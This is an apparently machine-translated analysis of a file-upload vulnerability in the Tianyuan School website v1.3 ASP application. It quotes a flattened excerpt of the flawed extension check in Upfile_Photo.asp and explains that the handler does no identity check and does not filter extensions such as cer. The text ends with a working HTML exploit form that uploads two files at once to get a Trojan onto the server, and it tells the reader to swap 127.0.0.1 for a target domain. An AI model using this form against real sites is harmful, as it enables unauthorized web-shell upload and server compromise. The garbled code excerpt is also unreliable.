Tianyuan School website v1.3 Upload Vulnerability Analysis

Open the admin directory and find an upload. asp file, which is submitted and judged by the submitted file.
If Uprequest. form ("file_Err") 0 then select case Uprequest. form ("file_Err ")
However, I haven't seen what this file_Err reads after reading it for a long time. (I am very fond of it) Go to the front-end directory and check whether it is useful.
This file was also found at the front-end.

Upload_Photo.asp open the source file and find that the submitted address is Upfile_Photo.asp.
Open the source code of Upfile_Photo.asp and find that the program does not judge the user identity. If the program has been uploaded, we can directly submit it,
Continue to look down. The more you see it, the more familiar you are. I posted the code for the vulnerability.

For I = 0 to ubound (arrUpFileType) 'determines the file suffix. If it belongs to the suffix required by the program, set the EnableUpload variable to True if fileEXT = trim (arrUpFileType (I )) then EnableUpload = true exit for end if next if fileEXT = "asp" or fileEXT = "asa" or fileEXT = "aspx" then determines whether the file suffix belongs to asp, asa, and aspx. three types (key issues also occur here, enableUpload = false. Here, no suffixes such as cer and php are filtered, and no Trim is used to filter spaces) end if EnableUpload = false then msg = "this file type cannot be uploaded! Only these file types can be uploaded: "& UpFileType FoundErr = true to determine whether our EnableUpload variable is true or false, the true representation is valid end if strJS = "" & vbcrlf if FoundErrtrue then randomize ranNum = int (900 * rnd) + 100. Here, the FoundErr variable is determined again, if it is not True, you can upload the file. Filename = "big" & year (now) & month (now) & day (now) & hour (now) & minute (now) & second (now) & ranNum &". "& fileExt smallfilename = year (now) & month (now) & day (now) & hour (now) & minute (now) & second (now) & ranNum &". "& fileExt ofile. saveToFile Server. does the mappath (SavePath & filename) save the file as the previous Mobile upload vulnerability? Since there is no component to upload multiple files in this environment, we can bypass the judgment by uploading two files with different suffixes at the same time, so as to directly submit our Trojan horse to the server.

<Form action ="Http: // 127.0.0.1/Upfile_Photo.asp"Method =" post "name =" form1 "enctype =" multipart/form-data "> change 127.0.0.1 to the domain name URL you want to submit.
<Input name = "FileName" type = "FILE" class = "tx1" size = "21">
<Input name = "FileName1" type = "FILE" class = "tx1" size = "21">
<Input type = "submit" name = "Submit" value = "Upload" style = "border: 1px double rgb (88,88, 88); font: 9pt">
<Input name = "PhotoUrlID" type = "hidden" id = "PhotoUrlID" value = "1">
</Form>